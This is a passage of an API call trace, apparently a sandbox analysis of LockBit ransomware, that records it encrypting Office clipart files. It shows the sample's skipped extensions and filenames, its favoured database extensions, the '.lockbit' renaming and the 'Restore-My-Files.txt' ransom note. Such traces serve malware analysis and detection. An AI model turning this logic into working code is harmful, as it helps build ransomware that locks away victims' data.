[0118.297] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH01329_.WMF") returned 1 [0118.297] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH01329_.WMF") returned -1 [0118.297] lstrcmpiW (lpString1="autorun.inf", lpString2="HH01329_.WMF") returned -1 [0118.297] lstrcmpiW (lpString1="thumbs.db", lpString2="HH01329_.WMF") returned 1 [0118.297] lstrcmpiW (lpString1="iconcache.db", lpString2="HH01329_.WMF") returned 1 [0118.297] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.297] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned=".WMF" [0118.297] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.297] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.297] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.297] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.297] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.297] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.297] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.297] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.297] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.297] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.297] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.297] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.297] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.298] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.298] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.298] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.298] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.298] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.298] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.298] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.298] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.298] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.298] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.298] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.298] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.298] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.298] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.298] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.298] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF.lockbit") returned 72 [0118.298] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01329_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0118.299] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.299] malloc (_Size=0x40068) returned 0x3e70008 [0118.299] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=6016) returned 1 [0118.299] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.300] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0118.300] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.300] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0118.300] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0118.305] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.305] malloc (_Size=0xa6) returned 0x77d7a8 [0118.305] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.306] free (_Block=0x77d7a8) [0118.306] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.306] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.306] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.306] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90080a00, ftCreationTime.dwHighDateTime=0x1bd4af9, ftLastAccessTime.dwLowDateTime=0x538951f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x90080a00, ftLastWriteTime.dwHighDateTime=0x1bd4af9, nFileSizeHigh=0x0, nFileSizeLow=0x1746, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH01461_.WMF", cAlternateFileName="")) returned 1 [0118.306] lstrcmpiW (lpString1=".", lpString2="HH01461_.WMF") returned -1 [0118.306] lstrcmpiW (lpString1="..", lpString2="HH01461_.WMF") returned -1 [0118.306] PathFindExtensionW (pszPath="HH01461_.WMF") returned=".WMF" [0118.306] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.306] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.307] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.308] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.308] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.309] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.309] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.309] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.309] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH01461_.WMF") returned 1 [0118.309] lstrcmpiW (lpString1="ntldr", lpString2="HH01461_.WMF") returned 1 [0118.309] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH01461_.WMF") returned 1 [0118.309] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH01461_.WMF") returned -1 [0118.309] lstrcmpiW (lpString1="autorun.inf", lpString2="HH01461_.WMF") returned -1 [0118.309] lstrcmpiW (lpString1="thumbs.db", lpString2="HH01461_.WMF") returned 1 [0118.309] lstrcmpiW (lpString1="iconcache.db", lpString2="HH01461_.WMF") returned 1 [0118.309] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.309] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned=".WMF" [0118.309] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.309] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.309] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.309] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.309] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.309] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.309] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.309] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.310] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.310] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF.lockbit") returned 72 [0118.311] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01461_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0118.311] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.311] malloc (_Size=0x40068) returned 0x3ef0008 [0118.311] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=5958) returned 1 [0118.311] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.312] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0118.312] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.312] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0118.313] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0118.320] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.320] malloc (_Size=0xa6) returned 0x77d7a8 [0118.320] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.321] free (_Block=0x77d7a8) [0118.321] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.321] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.321] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.322] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x538951f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1c80, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH01618_.WMF", cAlternateFileName="")) returned 1 [0118.322] lstrcmpiW (lpString1=".", lpString2="HH01618_.WMF") returned -1 [0118.322] lstrcmpiW (lpString1="..", lpString2="HH01618_.WMF") returned -1 [0118.322] PathFindExtensionW (pszPath="HH01618_.WMF") returned=".WMF" [0118.322] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.322] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.322] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.322] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.322] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.322] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.322] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.322] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.322] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.322] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.322] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.322] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.322] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.322] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.322] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.322] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.323] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.323] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.324] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.324] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.324] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.324] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.324] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.324] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.324] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.324] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.324] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.324] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH01618_.WMF") returned 1 [0118.324] lstrcmpiW (lpString1="ntldr", lpString2="HH01618_.WMF") returned 1 [0118.324] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH01618_.WMF") returned 1 [0118.324] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH01618_.WMF") returned -1 [0118.324] lstrcmpiW (lpString1="autorun.inf", lpString2="HH01618_.WMF") returned -1 [0118.324] lstrcmpiW (lpString1="thumbs.db", lpString2="HH01618_.WMF") returned 1 [0118.324] lstrcmpiW (lpString1="iconcache.db", lpString2="HH01618_.WMF") returned 1 [0118.324] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.324] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned=".WMF" [0118.324] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.324] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.324] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.324] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.325] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.326] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.326] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF.lockbit") returned 72 [0118.326] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01618_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0118.326] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.326] malloc (_Size=0x40068) returned 0x3d70450 [0118.326] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=7296) returned 1 [0118.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.327] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0118.327] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.328] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0118.328] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0118.333] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.333] malloc (_Size=0xa6) returned 0x77d7a8 [0118.333] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.334] free (_Block=0x77d7a8) [0118.334] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.334] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.334] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.334] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83101700, ftCreationTime.dwHighDateTime=0x1bd4bdc, ftLastAccessTime.dwLowDateTime=0x538951f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x83101700, 